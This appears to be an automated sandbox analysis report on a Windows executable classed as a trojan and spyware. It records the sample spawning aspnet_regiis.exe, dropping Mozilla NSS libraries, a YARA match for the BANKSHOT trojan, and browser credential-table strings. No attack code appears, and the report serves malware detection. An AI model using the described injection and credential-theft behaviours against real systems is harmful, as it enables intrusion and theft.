                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA94AA03_2_6CA94AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA7CAB03_2_6CA7CAB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD2AB03_2_6CAD2AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CADBA903_2_6CADBA90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA81AF03_2_6CA81AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAAE2F03_2_6CAAE2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA8AC03_2_6CAA8AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA9A603_2_6CAA9A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6F3803_2_6CA6F380
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD53C83_2_6CAD53C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAAD3203_2_6CAAD320
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA7C3703_2_6CA7C370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA653403_2_6CA65340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB6ECD03_2_6CB6ECD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB0ECC03_2_6CB0ECC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBEAC303_2_6CBEAC30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBD6C003_2_6CBD6C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB1AC603_2_6CB1AC60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB14DB03_2_6CB14DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC9CDC03_2_6CC9CDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBA6D903_2_6CBA6D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC3AD503_2_6CC3AD50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBDED703_2_6CBDED70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC98D203_2_6CC98D20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB96E903_2_6CB96E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB1AEC03_2_6CB1AEC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBB0EC03_2_6CBB0EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBF0E203_2_6CBF0E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBAEE703_2_6CBAEE70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB1EFB03_2_6CB1EFB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CBEEFF03_2_6CBEEFF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CB10FE03_2_6CB10FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC58FB03_2_6CC58FB0
                      Source: Joe Sandbox View | Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                      Source: C:\Users\user\Desktop\file.exe | Code function: String function: 6D5CDB80 appears 33 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 6CAA94D0 appears 90 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 02A047E8 appears 38 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 6CA9CBE8 appears 134 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 02A10609 appears 71 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 02A104E7 appears 36 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 6CC909D0 appears 37 times
                      Source: file.exe | Static PE information: invalid certificate
                      Source: file.exe, 00000000.00000002.1421898994.000000000114E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exe, 00000000.00000000.1407332677.0000000000C44000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe
                      Source: file.exe | Binary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe
                      Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: file.exe | Static PE information: Section: JO_E58 ZLIB complexity 1.0003312317251463
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/26@1/3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_6CAC7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02A114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02A11807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,RtlAllocateHeap,wsprintfA,VariantClear
                      Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\msvcp110.dll
                      Source: C:\Users\user\Desktop\file.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\Users\user\AppData\Local\Temp\delays.tmp
                      Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                      Source: aspnet_regiis.exe, 00000003.00000003.1834985106.0000000002E23000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DCD000.00000004.00000020.00020000.00000000.sdmp, JJKFBA.3.dr, CBKJEG.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: file.exe | Virustotal: Detection: 30%
                      Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: rstrtmgr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: dbghelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: schannel.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: sxs.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mozglue.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wsock32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: vcruntime140.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: msvcp140.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: windowscodecs.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: propsys.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: edputil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: appresolver.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: bcp47langs.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: slc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: sppc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ntvdm64.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: textshaping.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: textinputframework.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: coreuicomponents.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.ui.immersive.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47mrm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uianimation.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
